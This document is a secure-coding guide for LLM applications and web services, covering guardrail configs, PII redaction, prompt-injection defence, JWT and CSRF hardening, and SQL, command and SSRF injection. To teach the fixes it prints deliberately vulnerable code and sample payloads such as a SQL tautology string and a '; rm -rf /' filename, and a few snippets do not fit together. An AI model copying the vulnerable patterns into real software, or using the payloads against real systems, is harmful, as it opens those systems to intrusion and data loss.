user_input = request.json["message"]
response = llm.generate(user_input)  # Prompt injection risk!
return response  # Raw, unvalidated output!

Correct -- NeMo Guardrails with Guardrails AI integration:

# config.yml
models:
  - type: main
    engine: openai
    model: gpt-5.2

rails:
  config:
    guardrails_ai:
      validators:
        - name: toxic_language
          parameters:
            threshold: 0.5
            validation_method: "sentence"
        - name: guardrails_pii
          parameters:
            entities: ["phone_number", "email", "ssn", "credit_card"]
        - name: restricttotopic
          parameters:
            valid_topics: ["technology", "support"]

  input:
    flows:
      - guardrailsai check input $validator="guardrails_pii"
  output:
    flows:
      - guardrailsai check output $validator="toxic_language"
      - guardrailsai check output $validator="restricttotopic"

Correct -- Colang 2.0 fact-checking rails:

define flow answer question with facts
  """Enable fact-checking for RAG responses."""
  user ...
  $answer = execute rag()
  $check_facts = True
  bot $answer

define flow check hallucination
  """Block responses about people without verification."""
  user ask about people
  $check_hallucination = True
  bot respond about people

Correct -- Guardrails AI validators in Python:

from guardrails import Guard
from guardrails.hub import ToxicLanguage, DetectPII, RestrictToTopic, ValidLength

guard = Guard().use_many(
    ToxicLanguage(threshold=0.5, on_fail="filter"),
    DetectPII(pii_entities=["EMAIL_ADDRESS", "PHONE_NUMBER", "SSN"], on_fail="fix"),
    RestrictToTopic(valid_topics=["technology", "support"], on_fail="refrain"),
    ValidLength(min=10, max=500, on_fail="reask"),
)

# Always validate BOTH input and output
input_result = input_guard.validate(user_input)
if not input_result.validation_passed:
    return "Invalid input"

llm_output = llm.generate(input_result.validated_output)
output_result = guard(llm_api=openai.chat.completions.create, model="gpt-5.2",
                      messages=[{"role": "user", "content": user_input}])

if output_result.validation_passed:
    return output_result.validated_output

Key decisions:

  • NeMo for programmable flows (Colang 2.0), Guardrails AI for validators
  • Toxicity threshold: 0.5 for content apps, 0.3 for children's apps
  • PII handling: Redact for logs, block for outputs
  • Topic restriction: Allowlist preferred over blocklist
  • Always validate both input AND output
  • Never use single validation layer

LLM: Content Filtering & Three-Phase Pattern — HIGH

Content Filtering & Three-Phase Pattern

The Three-Phase Pattern

Phase 1: PRE-LLM     | Filter data, extract content, save refs
Phase 2: LLM CALL    | Content-only prompt, no identifiers
Phase 3: POST-LLM    | Validate output, attach attribution

Phase 1: Pre-LLM (Filter & Extract)

async def prepare_for_llm(query: str, ctx: RequestContext):
    # 1. Retrieve with tenant filter
    documents = await semantic_search(
        query_embedding=embed(query),
        ctx=ctx,  # Filters by tenant_id, user_id
    )

    # 2. Save references for attribution
    source_refs = SourceRefs(
        document_ids=[d.id for d in documents],
        chunk_ids=[c.id for c in chunks],
    )

    # 3. Extract content only (no IDs)
    content_texts = [strip_identifiers(d.content) for d in documents]

    return query, content_texts, source_refs

def strip_identifiers(text: str) -> str:
    """Remove any IDs from content."""
    text = re.sub(UUID_PATTERN, '[REDACTED]', text, flags=re.IGNORECASE)
    for pattern in [r'user_id:\s*\S+', r'tenant_id:\s*\S+']:
        text = re.sub(pattern, '[REDACTED]', text, flags=re.IGNORECASE)
    return text

Phase 2: LLM Call (Content Only)

def build_prompt(content: str, context_texts: list[str]) -> str:
    prompt = f"""
    Analyze the following content and provide insights.

    CONTENT:
    {content}

    RELEVANT CONTEXT:
    {chr(10).join(f"- {text}" for text in context_texts)}
    """

    # AUDIT: Verify no IDs leaked
    violations = audit_prompt(prompt)
    if violations:
        raise SecurityError(f"IDs leaked to prompt: {violations}")

    return prompt

async def call_llm(prompt: str) -> dict:
    """LLM only sees content, never IDs."""
    response = await llm.generate(prompt)
    return parse_response(response)

Phase 3: Post-LLM (Attribute)

async def save_with_attribution(
    llm_output: dict, ctx: RequestContext, source_refs: SourceRefs,
) -> Analysis:
    """Attribution is DETERMINISTIC, not LLM-generated."""

    # Validate no IDs in output
    if re.search(UUID_PATTERN, str(llm_output)):
        raise SecurityError("LLM output contains hallucinated IDs")

    return await Analysis.create(
        id=uuid4(),                                    # We generate
        user_id=ctx.user_id,                           # From context
        tenant_id=ctx.tenant_id,                       # From context
        trace_id=ctx.trace_id,                         # From context
        source_document_ids=source_refs.document_ids,  # From pre-LLM
        content=llm_output["analysis"],                # From LLM
        key_concepts=llm_output["key_concepts"],       # From LLM
        created_at=datetime.now(timezone.utc),
    )

Complete Workflow

async def safe_analyze(query: str, ctx: RequestContext, db_session):
    # Phase 1: Pre-LLM
    content, source_refs = await prepare_for_llm(query, ctx, db_session)

    # Phase 2: LLM Call
    prompt = build_prompt(content)
    llm_output = await call_llm(prompt, AnalysisOutput)

    # Phase 3: Post-LLM
    result = await attribute_and_save(
        llm_output=llm_output, ctx=ctx,
        source_refs=source_refs, db_session=db_session,
    )
    return result

Output Validation

After LLM returns, validate:

async def validate_output(llm_output: dict, context_texts: list[str]):
    # 1. Schema validation
    parsed = AnalysisOutput.model_validate(llm_output)

    # 2. Guardrails
    if await contains_toxic_content(parsed.content):
        return ValidationResult(valid=False, reason="Toxic content")

    # 3. Grounding check
    if not is_grounded(parsed.content, context_texts):
        return ValidationResult(valid=False, reason="Ungrounded claims")

    # 4. No hallucinated IDs
    if contains_uuid_pattern(parsed.content):
        return ValidationResult(valid=False, reason="Hallucinated IDs")

    return ValidationResult(valid=True)

Common Mistakes

# BAD: Asking LLM for attribution
prompt = "Analyze this and tell me which document it came from"
doc_id = response["source_document"]  # HALLUCINATED!

# BAD: Trusting LLM-provided IDs
artifact.user_id = llm_output["user_id"]  # WRONG!

# GOOD: Attribution from our records
artifact.user_id = ctx.user_id         # From JWT
artifact.sources = source_refs.doc_ids  # From pre-LLM
artifact.id = uuid4()                   # We generate

Checklist Before Any LLM Call

  • RequestContext available
  • Data filtered by tenant_id and user_id
  • Content extracted without IDs
  • Source references saved
  • Prompt passes audit
  • Output validated before use
  • Attribution uses context, not LLM output

Incorrect — Asking LLM for attribution leads to hallucinated document IDs:

prompt = f"Analyze this content and cite which documents support each claim."
response = await llm.generate(prompt)
# Save with LLM-generated document IDs
artifact.source_ids = response["document_ids"]  # HALLUCINATED!

Correct — Save source references before LLM call, attach deterministically after:

# Phase 1: Save refs before LLM
docs = await semantic_search(query, ctx)
source_refs = [d.id for d in docs]
# Phase 2: LLM sees only content
response = await llm.generate(content_only_prompt)
# Phase 3: Attach saved refs
artifact.source_ids = source_refs  # From our records, not LLM

Apply output guardrails with schema validation, grounding checks, and content safety filtering — HIGH

Output Guardrails

Purpose

After LLM returns, validate output before using it:

  1. Schema: Response matches expected structure
  2. No IDs: No hallucinated UUIDs
  3. Grounded: Claims supported by provided context
  4. Safe: No toxic/harmful content
  5. Size: Within limits

Schema Validation

from pydantic import BaseModel, ValidationError

def validate_schema(llm_output: dict, schema: type[BaseModel]):
    try:
        parsed = schema.model_validate(llm_output)
        return parsed, ValidationResult(status="passed")
    except ValidationError as e:
        return None, ValidationResult(
            status="failed",
            reason=f"Schema error: {e.error_count()} errors",
        )

class AnalysisOutput(BaseModel):
    summary: str
    key_concepts: list[str]
    difficulty: str

No Hallucinated IDs

import re

UUID_PATTERN = r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'

def validate_no_ids(output: str) -> ValidationResult:
    uuids = re.findall(UUID_PATTERN, output, re.IGNORECASE)
    if uuids:
        return ValidationResult(
            status="failed",
            reason=f"Found {len(uuids)} hallucinated UUIDs",
        )
    return ValidationResult(status="passed")

Grounding Validation

def validate_grounding(output: str, context_texts: list[str], threshold: float = 0.3):
    output_terms = set(extract_key_terms(output))
    context_terms = set()
    for text in context_texts:
        context_terms.update(extract_key_terms(text))

    if not output_terms:
        return ValidationResult(status="warning", reason="No key terms")

    overlap = len(output_terms & context_terms) / len(output_terms)
    if overlap < threshold:
        return ValidationResult(
            status="warning",
            reason=f"Low grounding: {overlap:.2%}",
        )
    return ValidationResult(status="passed")

Content Safety

async def validate_content_safety(output: str):
    # PII detection
    pii_patterns = {
        "email": r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b',
        "phone": r'\b\d{3}[-.]?\d{3}[-.]?\d{4}\b',
        "ssn": r'\b\d{3}-\d{2}-\d{4}\b',
    }

    detected_pii = []
    for pii_type, pattern in pii_patterns.items():
        if re.search(pattern, output):
            detected_pii.append(pii_type)

    if detected_pii:
        return ValidationResult(
            status="warning",
            reason=f"PII detected: {detected_pii}",
        )
    return ValidationResult(status="passed")

Combined Validator

async def run_guardrails(
    llm_output: dict,
    context_texts: list[str],
    schema: type[BaseModel],
) -> tuple[BaseModel | None, list[ValidationResult]]:
    results = []

    # 1. Schema
    parsed, result = validate_schema(llm_output, schema)
    results.append(result)
    if not result.is_valid:
        return None, results

    output_str = str(llm_output)

    # 2. No hallucinated IDs
    results.append(validate_no_ids(output_str))

    # 3. Grounding check
    results.append(validate_grounding(output_str, context_texts))

    # 4. Content safety
    results.append(await validate_content_safety(output_str))

    # 5. Size limits
    results.append(validate_size(output_str))

    failures = [r for r in results if r.status == "failed"]
    if failures:
        return None, results

    return parsed, results

Anti-Patterns

# BAD: No validation
artifact.content = llm_response["content"]

# BAD: Only schema validation
parsed = AnalysisOutput.parse_obj(response)

# BAD: Trusting LLM self-assessment
if llm_response.get("is_safe", True):
    use_response(llm_response)

# GOOD: Full guardrail pipeline
parsed, results = await run_guardrails(
    llm_output=response, context_texts=context, schema=AnalysisOutput,
)

Incorrect — Trusting LLM output without validation allows toxic content and hallucinated IDs:

response = await llm.generate(prompt)
analysis = Analysis(
    content=response["summary"],  # Could be toxic
    document_id=response["doc_id"],  # Hallucinated UUID!
)
await db.save(analysis)

Correct — Multi-layer guardrails validate schema, detect hallucinated IDs, and check grounding:

response = await llm.generate(prompt)
parsed, results = await run_guardrails(
    llm_output=response, context_texts=context, schema=AnalysisOutput,
)
if not parsed:
    raise ValidationError(f"Guardrails failed: {results}")
# Now safe to use parsed output

Defend against prompt injection by routing identifiers around the LLM, not through prompts — HIGH

Prompt Injection Defense

The Core Principle

Identifiers flow AROUND the LLM, not THROUGH it. The LLM sees only content. Attribution happens deterministically.

Why IDs in Prompts Are Dangerous

  1. Hallucination: LLM invents IDs that don't exist
  2. Confusion: LLM mixes up which ID belongs where
  3. Injection: Attacker manipulates IDs via prompt injection
  4. Leakage: IDs appear in logs, caches, traces
  5. Cross-tenant: LLM could reference other users' data

Forbidden Parameters in Prompts

ParameterTypeWhy Forbidden
user_idUUIDHallucination risk, cross-user access
tenant_idUUIDCritical for multi-tenant isolation
analysis_idUUIDJob tracking, not for LLM
document_idUUIDSource tracking, not for LLM
session_idstrAuth context, not for LLM
api_keystrSecret exposure
Any UUIDUUIDPattern: [0-9a-f]\{8\}-...

Detection Pattern

import re

FORBIDDEN_PATTERNS = [
    r'user[_-]?id', r'tenant[_-]?id',
    r'analysis[_-]?id', r'document[_-]?id',
    r'session[_-]?id', r'trace[_-]?id',
    r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
]

def audit_prompt(prompt: str) -> list[str]:
    violations = []
    for pattern in FORBIDDEN_PATTERNS:
        if re.search(pattern, prompt, re.IGNORECASE):
            violations.append(pattern)
    return violations

Safe Prompt Builder

class SafePromptBuilder:
    def __init__(self, strict: bool = True):
        self._parts: list[str] = []
        self._context: dict[str, Any] = {}
        self._strict = strict

    def add_system(self, instruction: str) -> "SafePromptBuilder":
        audit = audit_text(instruction)
        if not audit.is_clean:
            raise PromptSecurityError("Forbidden content", audit.critical_violations)
        self._parts.append(f"SYSTEM:\n{instruction}")
        return self

    def add_user_query(self, query: str) -> "SafePromptBuilder":
        clean = self._sanitize(query)
        self._parts.append(f"USER QUERY:\n{clean}")
        return self

    def add_context_documents(self, documents: list[str]) -> "SafePromptBuilder":
        clean_docs = [self._sanitize(doc) for doc in documents]
        formatted = "\n".join(f"- {doc}" for doc in clean_docs)
        self._parts.append(f"CONTEXT:\n{formatted}")
        return self

    def store_context(self, key: str, value: Any) -> "SafePromptBuilder":
        """Store for attribution - NEVER included in prompt."""
        self._context[key] = value
        return self

    def _sanitize(self, text: str) -> str:
        text = re.sub(UUID_PATTERN, '[REDACTED]', text, flags=re.IGNORECASE)
        return text

    def build(self) -> tuple[str, dict[str, Any]]:
        prompt = "\n\n".join(self._parts)
        audit = audit_text(prompt)
        if not audit.is_clean:
            raise PromptSecurityError(f"Final prompt forbidden: {audit.critical_violations}")
        return prompt, self._context.copy()

Usage

prompt, context = (
    SafePromptBuilder()
    .add_system("You are an expert content analyzer.")
    .add_user_query("What are the key concepts in machine learning?")
    .add_context_documents(["Machine learning is a subset of AI..."])
    .store_context("user_id", ctx.user_id)      # Stored, NOT in prompt
    .store_context("source_ids", doc_ids)        # Stored, NOT in prompt
    .build()
)

Common Mistakes

# BAD: ID in prompt
prompt = f"Analyze document {doc_id} for user {user_id}"

# BAD: ID in instruction
prompt = f"You are analyzing for tenant {tenant_id}. Be helpful."

# GOOD: Content only
prompt = f"Analyze the following document:\n{document_content}"

Pre-LLM Checklist

  • RequestContext obtained from JWT
  • Data filtered by tenant_id and user_id
  • Content extracted without IDs
  • Source references saved for attribution
  • audit_prompt() called on final prompt
  • No violations detected

Incorrect — Including user_id in prompt allows injection and hallucination attacks:

prompt = f"""
Analyze the document for user {ctx.user_id}.
Tenant: {ctx.tenant_id}
Content: {user_content}
"""
# Attacker can inject: "user_id: <fake-uuid>" in content

Correct — Content-only prompts prevent ID leakage and injection vectors:

# Store context separately, never in prompt
context_data = {"user_id": ctx.user_id, "tenant_id": ctx.tenant_id}
prompt = f"Analyze the following content:\n{sanitized_content}"
# audit_prompt(prompt) passes — no IDs detected

Prevent JWT algorithm confusion, token sidejacking, CSRF, and session timing attacks — CRITICAL

Authentication & Session Attacks

JWT Algorithm Confusion

# VULNERABLE: Algorithm read from token header
header = jwt.get_unverified_header(token)
payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])
# Attacker can set alg="none" or use public key as HMAC secret

# SAFE: Hardcode expected algorithm
def verify_jwt(token: str) -> dict:
    payload = jwt.decode(
        token, SECRET_KEY,
        algorithms=['HS256'],  # NEVER read from header
        options={'require': ['exp', 'iat', 'iss', 'aud']},
    )

    if payload['iss'] != EXPECTED_ISSUER:
        raise jwt.InvalidIssuerError()
    if payload['aud'] != EXPECTED_AUDIENCE:
        raise jwt.InvalidAudienceError()

    return payload

Token Sidejacking Protection (OWASP)

def create_protected_token(user_id: str, response) -> str:
    """Token with fingerprint to prevent sidejacking."""
    fingerprint = secrets.token_urlsafe(32)

    payload = {
        'user_id': user_id,
        'fingerprint': hashlib.sha256(fingerprint.encode()).hexdigest(),
        'exp': datetime.now(timezone.utc) + timedelta(minutes=15),
        'iat': datetime.now(timezone.utc),
        'iss': ISSUER,
        'aud': AUDIENCE,
    }

    # Send raw fingerprint as hardened cookie
    response.set_cookie(
        '__Secure-Fgp', fingerprint,
        httponly=True, secure=True,
        samesite='Strict', max_age=900,
    )

    return jwt.encode(payload, SECRET_KEY, algorithm='HS256')

CSRF Protection

# VULNERABLE: No CSRF protection
@app.post("/transfer")
async def transfer_money(to_account: str = Form(...), amount: float = Form(...)):
    perform_transfer(to_account, amount)

# SAFE: CSRF token validation
def verify_csrf_token(request: Request, csrf_token: str = Form(...)):
    if request.session.get("csrf_token") != csrf_token:
        raise HTTPException(status_code=403, detail="CSRF token mismatch")

@app.post("/transfer")
async def transfer_money(
    to_account: str = Form(...), amount: float = Form(...),
    _: None = Depends(verify_csrf_token),
):
    perform_transfer(to_account, amount)
# Alternative: SameSite cookies
response.set_cookie(
    key="session_id", value=session_token,
    httponly=True, secure=True,
    samesite="strict",  # Key CSRF protection
)

Timing Attack Prevention

# VULNERABLE: Character-by-character comparison
def check_password(stored_hash: str, provided_hash: str) -> bool:
    for a, b in zip(stored_hash, provided_hash):
        if a != b:
            return False  # Early exit reveals info
    return True

# SAFE: Constant-time comparison
import hmac
def check_password_secure(stored_hash: str, provided_password: str) -> bool:
    provided_hash = hashlib.sha256(provided_password.encode()).hexdigest()
    return hmac.compare_digest(stored_hash, provided_hash)

# Better: Use a proper library
from argon2 import PasswordHasher
ph = PasswordHasher()
ph.verify(stored_hash, password)  # Handles timing safely

Security Misconfiguration

# VULNERABLE: Debug mode in production
app.debug = True

# SAFE: Environment-based config
app.debug = os.getenv('FLASK_ENV') == 'development'

# VULNERABLE: CORS allow all
CORS(app, origins="*", allow_credentials=True)

# SAFE: Explicit origins
CORS(app, origins=["https://app.example.com"], allow_credentials=True)

Vulnerable Components

# Scan for vulnerabilities
npm audit
pip-audit

# Fix vulnerabilities
npm audit fix

JWT Security Checklist

  • Hardcode algorithm (never read from header)
  • Validate: exp, iat, iss, aud claims
  • Short expiry (15 min - 1 hour)
  • Use refresh token rotation for longer sessions
  • Implement token denylist for logout/revocation

Detection

# JWT algorithm confusion
grep -rn "get_unverified_header\|algorithms=\[" --include="*.py" .

# Missing SameSite cookies
grep -rn "set_cookie\|setCookie" --include="*.py" . | grep -v "samesite"

# CSRF exempt decorators
grep -rn "@csrf_exempt" --include="*.py" .

# Timing attack vulnerable comparisons
semgrep --config "p/python-security-audit" .

Incorrect — reading JWT algorithm from untrusted token header:

header = jwt.get_unverified_header(token)
payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])

Correct — hardcoding expected algorithm with claim validation:

payload = jwt.decode(
    token, SECRET_KEY,
    algorithms=['HS256'],
    options={'require': ['exp', 'iat', 'iss', 'aud']},
)

Summary

VulnerabilityBandit IDFix
SQL InjectionB608Parameterized queries
JWT AlgorithmB105Hardcode algorithm
Timing AttackB303hmac.compare_digest
XSSN/AtextContent, escape()
CSRFN/ASameSite cookies, tokens

Prevent SQL, command, and SSRF injection with parameterized queries and input validation — CRITICAL

Injection Prevention

SQL Injection

Vulnerable — user input directly interpolated into query:

# VULNERABLE: User input directly in query
query = f"SELECT * FROM users WHERE email = '{email}'"

Safe — parameterized query and ORM:

# SAFE: Parameterized query
query = "SELECT * FROM users WHERE email = ?"
db.execute(query, [email])

# SAFE: ORM
db.query(User).filter(User.name == name).first()

SQL Injection Attack Demo

Vulnerable — f-string interpolation allows injection payload:

# Vulnerable endpoint
@app.get("/users/search")
def search_users(username: str = Query(...)):
    query = f"SELECT * FROM users WHERE username = '{username}'"
    cursor.execute(query)
    return cursor.fetchall()

# Attack payload: username = "' OR '1'='1' --"
# Resulting query: SELECT * FROM users WHERE username = '' OR '1'='1' --'
# Returns ALL users

Safe — parameterized query prevents injection:

@app.get("/users/search")
def search_users(username: str = Query(..., min_length=1, max_length=50)):
    cursor.execute("SELECT * FROM users WHERE username = ?", (username,))
    return cursor.fetchall()

Command Injection

# VULNERABLE: User input in shell command
import os
os.system(f"convert {filename} output.png")  # filename = "; rm -rf /"

# SAFE: subprocess with list args
import subprocess
subprocess.run(["convert", filename, "output.png"], check=True)

SSRF (Server-Side Request Forgery)

# VULNERABLE: Fetch any URL
response = requests.get(user_provided_url)

# SAFE: Allowlist domains
ALLOWED = ['api.example.com']
if urlparse(url).hostname not in ALLOWED:
    abort(400)
response = requests.get(url)

Broken Access Control (IDOR)

# VULNERABLE: No authorization check
@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int):
    return db.query(Document).get(doc_id)  # Anyone can access any doc

# SAFE: Authorization check
@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int, current_user: User = Depends(get_current_user)):
    doc = db.query(Document).get(doc_id)
    if doc.owner_id != current_user.id and not current_user.is_admin:
        raise HTTPException(403, "Access denied")
    return doc

Cryptographic Failures

# VULNERABLE: Weak hashing
import hashlib
password_hash = hashlib.md5(password.encode()).hexdigest()

# SAFE: Modern password hashing
from argon2 import PasswordHasher
ph = PasswordHasher()
password_hash = ph.hash(password)

Insecure Deserialization

# VULNERABLE: Pickle from untrusted source
import pickle
data = pickle.loads(user_input)  # Can execute arbitrary code

# SAFE: Use JSON
import json
data = json.loads(user_input)  # Only parses data

Detection Commands

# Detect SQL injection patterns
grep -rn "f\"SELECT\|f\"INSERT\|f\"UPDATE\|f\"DELETE" --include="*.py" .
bandit -r . -t B608

# Detect command injection
semgrep --config "p/python-security-audit" .

# Detect SSRF
grep -rn "requests.get\|urllib.urlopen" --include="*.py" .

Incorrect — interpolating user input directly into SQL query:

query = f"SELECT * FROM users WHERE email = '{email}'"
cursor.execute(query)

Correct — using parameterized query to prevent injection:

cursor.execute("SELECT * FROM users WHERE email = ?", (email,))

Quick Reference

VulnerabilityFix
SQL InjectionParameterized queries, ORM
Command Injectionsubprocess with list args
SSRFURL domain allowlist
IDORAuthorization check on every endpoint
Weak cryptoArgon2/bcrypt, not MD5/SHA1
Insecure deserializationJSON, not pickle

Detect PII exposure through regex and ML-based patterns using Presidio and LLM Guard — HIGH

PII Detection Patterns

Regex-Based Detection

import re

def mask_pii(data, **kwargs):
    """Mask PII using regex patterns."""
    if isinstance(data, str):
        # Credit cards
        data = re.sub(r'\b(?:\d[ -]*?){13,19}\b', '[REDACTED_CC]', data)
        # Emails
        data = re.sub(r'\b[\w.-]+@[\w.-]+\.\w+\b', '[REDACTED_EMAIL]', data)
        # Phone numbers
        data = re.sub(r'\b\d{3}[-.]?\d{3}[-.]?\d{4}\b', '[REDACTED_PHONE]', data)
        # SSN
        data = re.sub(r'\b\d{3}-\d{2}-\d{4}\b', '[REDACTED_SSN]', data)
    return data

Microsoft Presidio Pipeline

from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine

analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()

def detect_pii(text: str, language: str = "en") -> list:
    return analyzer.analyze(
        text=text, language=language,
        entities=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD", "US_SSN"]
    )

def anonymize_text(text: str, language: str = "en") -> str:
    results = analyzer.analyze(text=text, language=language)
    return anonymizer.anonymize(text=text, analyzer_results=results).text

Presidio Custom Operators

from presidio_anonymizer.entities import OperatorConfig

operators = {
    "PERSON": OperatorConfig("replace", {"new_value": "[PERSON]"}),
    "CREDIT_CARD": OperatorConfig("mask", {"masking_char": "*", "chars_to_mask": 12}),
    "EMAIL_ADDRESS": OperatorConfig("hash", {"hash_type": "sha256"}),
    "US_SSN": OperatorConfig("redact"),
}

anonymized = anonymizer.anonymize(text=text, analyzer_results=results, operators=operators)

Custom Recognizers

from presidio_analyzer import Pattern, PatternRecognizer

internal_id_recognizer = PatternRecognizer(
    supported_entity="INTERNAL_ID",
    patterns=[Pattern(name="internal_id", regex=r"ID-[A-Z]{2}-\d{6}", score=0.9)]
)
analyzer.registry.add_recognizer(internal_id_recognizer)

LLM Guard Anonymization

from llm_guard.input_scanners import Anonymize
from llm_guard.vault import Vault

vault = Vault()
scanner = Anonymize(
    vault=vault, language="en",
    entity_types=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD"],
    use_faker=True,  # Replace with fake data
)

def sanitize_input(prompt: str) -> tuple[str, bool, float]:
    sanitized_prompt, is_valid, risk_score = scanner.scan(prompt)
    return sanitized_prompt, is_valid, risk_score

# "My name is Jane Smith" -> "My name is [REDACTED_PERSON_1]"

LLM Guard Output Scanning

from llm_guard.output_scanners import Sensitive

sensitive_scanner = Sensitive(
    entity_types=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD"],
    redact=True,
    threshold=0.5,
)

def check_output_for_pii(prompt: str, output: str):
    sanitized_output, is_valid, risk_score = sensitive_scanner.scan(prompt, output)
    return sanitized_output, is_valid, risk_score

Anti-Patterns

# NEVER log raw PII
logger.info(f"User email: {user.email}")

# NEVER send unmasked data to observability
langfuse.trace(input=raw_prompt)

# ALWAYS mask before logging
logger.info(f"User email: {mask_pii(user.email)}")

# ALWAYS use mask callback
langfuse = Langfuse(mask=mask_pii)

Key Decisions

DecisionRecommendation
Detection enginePresidio (enterprise), regex (simple), LLM Guard (LLM pipelines)
Masking strategyReplace with type tokens [REDACTED_EMAIL]
PerformanceAsync/batch for high-throughput
ReversibilityLLM Guard Vault for deanonymization

Incorrect — Logging raw user input exposes PII to log aggregators:

logger.info(f"Processing request for {user.email}")
# Logs: "Processing request for john.doe@company.com"

Correct — Detect and mask PII before logging using Presidio:

from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine

results = analyzer.analyze(text=user.email, language="en")
masked = anonymizer.anonymize(text=user.email, analyzer_results=results).text
logger.info(f"Processing request for {masked}")
# Logs: "Processing request for [EMAIL_ADDRESS]"

Redact PII from logs and traces automatically in Langfuse, structlog, and observability tools — HIGH

PII Redaction & Observability Integration

Langfuse Mask Callback

import re
from langfuse import Langfuse

PII_PATTERNS = {
    "email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
    "phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
    "ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
}

def mask_pii(data: dict) -> dict:
    def redact_string(value: str) -> str:
        for entity_type, pattern in PII_PATTERNS.items():
            value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
        return value

    def redact_recursive(obj):
        if isinstance(obj, str):
            return redact_string(obj)
        elif isinstance(obj, dict):
            return {k: redact_recursive(v) for k, v in obj.items()}
        elif isinstance(obj, list):
            return [redact_recursive(item) for item in obj]
        return obj

    return redact_recursive(data)

langfuse = Langfuse(mask=mask_pii)

Langfuse with Presidio

from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine

analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()

def presidio_mask(data: dict) -> dict:
    def anonymize_string(value: str) -> str:
        if len(value) < 5:
            return value
        results = analyzer.analyze(text=value, language="en")
        if results:
            return anonymizer.anonymize(text=value, analyzer_results=results).text
        return value

    def process_recursive(obj):
        if isinstance(obj, str):
            return anonymize_string(obj)
        elif isinstance(obj, dict):
            return {k: process_recursive(v) for k, v in obj.items()}
        elif isinstance(obj, list):
            return [process_recursive(item) for item in obj]
        return obj

    return process_recursive(data)

langfuse = Langfuse(mask=presidio_mask)

Structlog PII Processor

import structlog

PII_PATTERNS = {
    "email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
    "phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
    "ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
    "credit_card": re.compile(r'\b(?:\d[ -]*?){13,19}\b'),
}

def redact_pii(logger, method_name: str, event_dict: dict) -> dict:
    def redact_value(value):
        if isinstance(value, str):
            result = value
            for entity_type, pattern in PII_PATTERNS.items():
                result = pattern.sub(f'[REDACTED_{entity_type.upper()}]', result)
            return result
        elif isinstance(value, dict):
            return {k: redact_value(v) for k, v in value.items()}
        elif isinstance(value, list):
            return [redact_value(item) for item in value]
        return value

    return {k: redact_value(v) for k, v in event_dict.items()}

structlog.configure(processors=[
    structlog.processors.add_log_level,
    structlog.processors.TimeStamper(fmt="iso"),
    redact_pii,
    structlog.processors.JSONRenderer(),
])

Loguru PII Filter

from loguru import logger

def pii_filter(record):
    message = record["message"]
    for entity_type, pattern in PII_PATTERNS.items():
        message = pattern.sub(f'[REDACTED_{entity_type.upper()}]', message)
    record["message"] = message
    return True

logger.remove()
logger.add("logs/app.log", filter=pii_filter, serialize=True)

# Usage
logger.info("User john@example.com logged in from 192.168.1.1")
# Output: "User [REDACTED_EMAIL] logged in from [REDACTED_IP]"

Field-Specific Redaction

SENSITIVE_FIELDS = {
    "email", "phone", "ssn", "credit_card", "password",
    "api_key", "token", "secret", "authorization"
}

def smart_redact_processor(logger, method_name, event_dict):
    result = {}
    for key, value in event_dict.items():
        if key.lower() in SENSITIVE_FIELDS:
            result[key] = "[REDACTED]"
        elif isinstance(value, str):
            result[key] = redact_pii_patterns(value)
        else:
            result[key] = value
    return result

LLM Guard Deanonymization

from llm_guard.input_scanners import Anonymize
from llm_guard.output_scanners import Deanonymize
from llm_guard.vault import Vault

vault = Vault()
anonymize = Anonymize(vault=vault, language="en")
deanonymize = Deanonymize(vault=vault)

# Anonymize input
sanitized_prompt, _, _ = anonymize.scan(original_prompt)

# Call LLM with sanitized input
llm_response = await llm.generate(sanitized_prompt)

# Restore original values in output
restored_output, _, _ = deanonymize.scan(sanitized_prompt, llm_response)

Full Secure Pipeline

class SecureLLMPipeline:
    def __init__(self):
        self.vault = Vault()
        self.anonymize = Anonymize(vault=self.vault, language="en")
        self.deanonymize = Deanonymize(vault=self.vault)
        self.sensitive_check = Sensitive(redact=True)

    async def process(self, user_input: str) -> str:
        # 1. Anonymize input
        sanitized_input, _, input_risk = self.anonymize.scan(user_input)

        # 2. Call LLM with sanitized input
        llm_response = await self.llm.generate(sanitized_input)

        # 3. Check output for leaked PII
        checked_output, _, output_risk = self.sensitive_check.scan(
            sanitized_input, llm_response
        )

        # 4. Deanonymize for user
        final_output = self.deanonymize.scan(sanitized_input, checked_output)[0]

        return final_output

Testing

def test_pii_redaction_in_logs():
    output = StringIO()
    structlog.configure(
        processors=[redact_pii, structlog.processors.JSONRenderer()],
        logger_factory=structlog.WriteLoggerFactory(file=output),
    )
    logger = structlog.get_logger()
    logger.info("test", email="test@example.com", ssn="123-45-6789")

    log_output = output.getvalue()
    assert "test@example.com" not in log_output
    assert "123-45-6789" not in log_output
    assert "[REDACTED_EMAIL]" in log_output
    assert "[REDACTED_SSN]" in log_output

Incorrect — Sending raw prompts to Langfuse leaks PII to observability platform:

langfuse = Langfuse()
trace = langfuse.trace(
    input="My email is john@example.com and SSN is 123-45-6789"
)
# PII stored in Langfuse without redaction

Correct — Mask callback automatically redacts PII before sending to Langfuse:

langfuse = Langfuse(mask=mask_pii)
